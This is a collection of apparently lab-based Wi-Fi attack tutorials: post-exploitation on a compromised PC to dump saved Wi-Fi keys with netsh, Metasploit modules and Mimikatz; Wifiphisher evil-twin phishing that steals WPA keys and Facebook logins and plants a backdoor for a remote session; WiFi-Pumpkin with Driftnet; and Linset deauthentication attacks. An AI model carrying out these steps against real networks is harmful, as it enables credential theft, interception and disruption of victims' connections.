Wifi Post Exploitation on Remote PC

Most of the Security protocols of Wi-Fi networks are often broken or bypassed exposing the wireless internet traffic to attackers. Through this article one can learn about different ways to get basic service sets information of remote user’s Wi-Fi as well as current network connection information, and how to extract saved Wireless LAN profiles of remote pc after that you will be disconnecting target user’s Wi-Fi too. All the following attacks are post exploitation attacks.

Table of Content

  • Introduction
  • Working of Wi-Fi
  • Types of Wi-Fi security
  • WLAN BSS List
  • WLAN Current Connection
  • WLAN Profile
  • WLAN Disconnect
  • Mimikatz
  • Netsh

Introduction

All wireless networking technology is commonly known as Wi-Fi. It provides high-speed internet as it works on radio waves. Wi-Fi trademark is owned by the company the Wi-Fi Alliance; it officially defined as Wireless Local Area Network (WLAN). It is supported by many applications and devices such as mobile phones, PDAs, OS, Video game consoles, etc. therefore, it lets all the devices to communicate easily.

Working of Wi-Fi

As the name suggests, the Wi-Fi network has no physical connection between the sender and the receiver. It uses radio frequency within the electromagnetic spectrum associated with radio waves. Therefore, it is able to provide high-speed internet. Every Wi-Fi connection works through an Access Point (AP). The main job of an access point is to broadcast the signal that is further detected by electronic devices. ones the signal is detected they connect to the Wi-Fi in order to use Wi-Fi.

Types of Wi-Fi security

  • Wired Equivalent Privacy
  • Wi-Fi Protected Access
  • Wi-Fi Protected Access 2

Netsh

Now that you have a session of the victim’s PC, go to the shell and use the following command to find out the wi-fi connections of victims’ PC over the time ;

As the above image shows, till date, the PC was connected to the Pentest Lab, Sinos, POCO PHONE, ignit. Now, we can use the following to gain detailed information about the network :

Now, use the following command to see the password of a particular wi-fi :

WLAN BSS List

This module gathers information about the wireless Basic Service Sets available to the victim machine.

e.g. this will give you SSID and other important information regarding wireless connection.

From given below image you can observe that here it has found “5 networks” such as Pen lab, Sinos, Ignite and etc along with their basic 3 Details

WLAN Current Connection

This module gathers information about the current connection on each wireless LAN interface on the target machine.

The given below image has disclosed that  “pen Lab” is the current connection through which victim is connected moreover it has shown some basic details such as MAC address of the router, Security status, Authentication type and etc.  

WLAN Profile

This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived the key.

From given below image you can see it has extracted the profile of wifi through which victim is connected moreover it has also decrypted the shared key (password). Hence you can confirm the password for “Pen Lab” is “[email protected]”.  

WLAN Disconnect

This module disconnects the current wireless network connection on the specified interface.

From given below image you can confirm that it is disconnecting the victim from the current wireless network.

Mimikatz

I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.

This will give you the entire wireless connection list with passwords as well.  VOILA! You got it right.

Great!!  From given below image you can confirm that it has dumped all shared keys (password)  and authentication of their respective SSID.

About the Author

Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Hiddenramp as a Security Analyst. Connect with her here

WiFi Exploitation with WifiPhisher

Hello friends! Today we are going to demonstrate WIFI- Phishing attack by using the very great tool “WIFIphisher”, please read its description for more details.

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malware. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third-party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Requirement

  • Kali Linux.
  • Two WiFi adapter; one that supports AP mode and another that supports monitor mode.

Wifiphisher Working

After achieving a man-in-the-middle position using the Evil Twin or KARMA attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim’s perspective, the attack makes use in three phases:

  1. The victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point’s WiFi devices within range by forging “De-authenticate” or “Disassociate” packets to disrupt existing associations.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed. Furthermore, Wifiphisher listens to probe request frames and spoofs “known” open networks to cause automatic association.
  3. The victim is being served a realistic specially customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malware. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim’s vendor. The tool supports community-built templates for different phishing scenarios.

Let’s start!!!

Open the terminal in your Kali Linux and type the following command to download wifiphisher from GitHub.

Once it gets downloaded, run the python file to install its setup and dependencies as shown below:

Now run the script by typing wifiphisher on the terminal to launch a wifi-phishing attack which as similar as social engineering.

Here it will fetch all interfaces as shown in the given image and let an attacker choose any one ESSID/BSSID of the target network and try to trap victim by performing phishing. It will also perform both Evil Twin and KARMA attacks.

From the list of the interface, I had targeted “iball-baton” to trap the victim connect from it.

After that you will get 4 phishing scenarios to trap your target as given below:

  1. Firmware Upgrade page
  2. Network Manager connect
  3. Browser plugin update
  4. Oauth login Page

Now let’s go through each phishing scenario one by one starting from the 1st option.

Firmware Upgrade page: A router configuration page without logos or brands asking for WPA/WPA2 password due to a Firmware Upgrade page.

Now when the victim will open his browser Firefox he will get a phishing page to upgrade the firmware that needs WPA/WPA2 password for installing a new version of firmware.

The victim may consider it as an official notification and go for upgrading by submitting his WIFI password. As the victim enter the password for WPA/WPA2 and click on start upgrade, he will get trap into a fake upgrade process.  

Following image is pretending to the victim that firmware is being upgraded don’t close the process until it completed while at the background the attacker has captured the WPA/WPA2 password.  

Great!! You can confirm the WPA/WPA2 password as shown in given below image, it is showing WPA –password: ram123456ram

Once again repeat the same step to select ESSID.

Now let us go through another phishing scenario from the 2nd option.

Network Manager Connect: Imitates the behavior of the network manager. This templates show’s chrome “connection Failed” page and displays a network manager window through the page asking for the pre=shared key. Currently, the network managers of windows and Mac Os are supported.  

Now when the victim will open browser he will get a fake page for “connection failed” and moreover a fake window for the network manager.

Here target will click on “connect” to reconnect with the interface.

It asks to enter the password for connection with the selected interface while at the background the attacker will capture the WPA/WPA2 password. 

Great!!  Again you can confirm the WPA/WPA2 password as shown in given below image, it has captured WPA –password: ram123456ram

Repeat the same step to choose ESSID for the attack.

Browser plugin update: A generic browser plugin update page that can be used to serve payloads to the victims.

It will create a .exe payload and run multi handler in the background for reverse connection of the victim system.

Now when the victim opens browser he will get another fake page for Update plugins as shown in the given image. here is recommended to update the flash player which is outdated.   

Now when the victim will click on Update Now, it will start downloading an update.exe file into a victim’s system which is nothing but an exe backdoor file for making unauthorized access in his system.

Awesome!! The attacker will get the reverse connection of the target’s system, from given below image you can see it has open meterpreter session 1.

Repeat the same step to choose ESSID for the attack.

Now move forward with its last option i.e. 4th option.

OAuth Login Page: A free WIFI service asking for a Facebook credential to authenticate using OAuth.

At this time when the victim will open a browser, he may get trap into phishing page set as “Get Connect to the Internet For free” as shown in the given image.

So when the victim will enter his Facebook credential for accessing free internet he will get trap in that phishing attack.

Here you can see a victim enters a username with password and click on the login for the Facebook connection he got an error message meanwhile attacker has capture victim’s Facebook credentials.

Wonderful!! An attacker successfully traps the victim and fetched his Facebook account credential.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

Capture Images in Mobile using Driftnet through Wifi Pumpkin

WiFi-Pumpkin is an open source security tool that provides the Rogue access point to Man-In-The-Middle and network attacks. Using WiFi Pumpkin, one can create a wifi network that captures all the requests made within the network by any device that connects to the network.

First of all, u need to download WiFi Pumpkin and install it in your Kali Linux. To download WiFi Pumpkin, go to //github.com/P0cL4bs/WiFi-Pumpkin and click on Clone or Download. Thereafter, copy the URL to the clipboard and open the terminal. Type in:-

 git clone “URL copied to clipboard”

Next, go to the directory of WiFi Pumpkin on the terminal. For eg., if the repo is downloaded to the Desktop, type:

Thereafter, run wifi-pumpkin:

This will open the GUI version of WiFi-Pumpkin. Now select the network adapter and change the SSID from PumpAP and rename it as desired.

Thereafter click on the Start button. This will create a new wifi-zone with the name entered in the SSID field.

Now as soon as any device connects to this wifi network, its details will be shown in the table at the right. Select any target device from the list of connected device/s and select Active Driftnet from the Tools menu.  

As soon as Driftnet starts, it will start sending screenshots from the victim’s desktop/mobile. This will also capture the images of facebook.

Author: Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

Hack Wifi using Evil Twin Method with Linset in kali Linux

Linset is a tool for Evil twin attack

How it works

  • Scan the networks.
  • Select network.
  • Capture handshake (can be used without handshake)
  • We choose one of several web interfaces tailored for me (thanks to the collaboration of the users)
  • Mounts one FakeAP imitating the original
  • A DHCP server is created on FakeAP
  • It creates a DNS server to redirect all requests to the Host
  • The web server with the selected interface is launched
  • The mechanism is launched to check the validity of the passwords that will be introduced
  • It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password.
  • The attack will stop after the correct password checking

 First of all download Linset from github with command:

git clone //github.com/vk496/linset.git

and then change the permissions of the linset script with command:

chmod +x linset

and then execute it with command:

./linset

After execution it will ask to choose the interface so select wlan0 for wireless extension which will put it into monitor mode.

Then it will ask to select the channel so enter 1 to select all the channels.

Now the monitor mode will listen to all the available wifi connections , so wait till your target appears and then press ctrl^c.

Now it will list  all the AP’s with their SSID ,id no. and signal strength , so enter the id of your target and hit Enter as in my case i have selected rajlab by entering 1.

Now select Hostapd by entering 1 which will help in creating Fake AP.

Now hit Enter for using default path to save the capture file or you can give the custom path to save the capture  file which will ask to select the method for cracking the handshake so select 1 for aircrack-ng.

Now select 1 to de-authenticate all the clients connected to the target AP to capture the handshake.

Now when the handshake is captured you will see it on right top corner of the new window and then enter 1 on the menu window as we have captured the handshake. 

Now select 1 for web interface which will be presented to the victim when he will connect to our fake AP.

Now it will ask for language selection of the web interface so enter 1 for English.

Now 4 terminal windows will be opened of which one will create the Fake AP , one will be regularly de-authenticating all the clients and one will  show all the info of the AP.

Now as you can see there are 2 rajlab AP are present of which one is fake and open and the other is the original but the clients will not be able to connect to the original one due to our deauth attack so they will be forced to connect to our fake AP.

After connecting to the Fake AP it will redirect the victim browser to below given web-page which will require the victim to enter the  original AP password as the attack will only stop when the victim will enter correct password.

After submitting the correct password , the attack will be stopped and a message will be generated that your connection will be restored .

As you can see in my case victim entered the correct password and we found the correct key as:

KEY FOUND! [ raj123987 ]

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .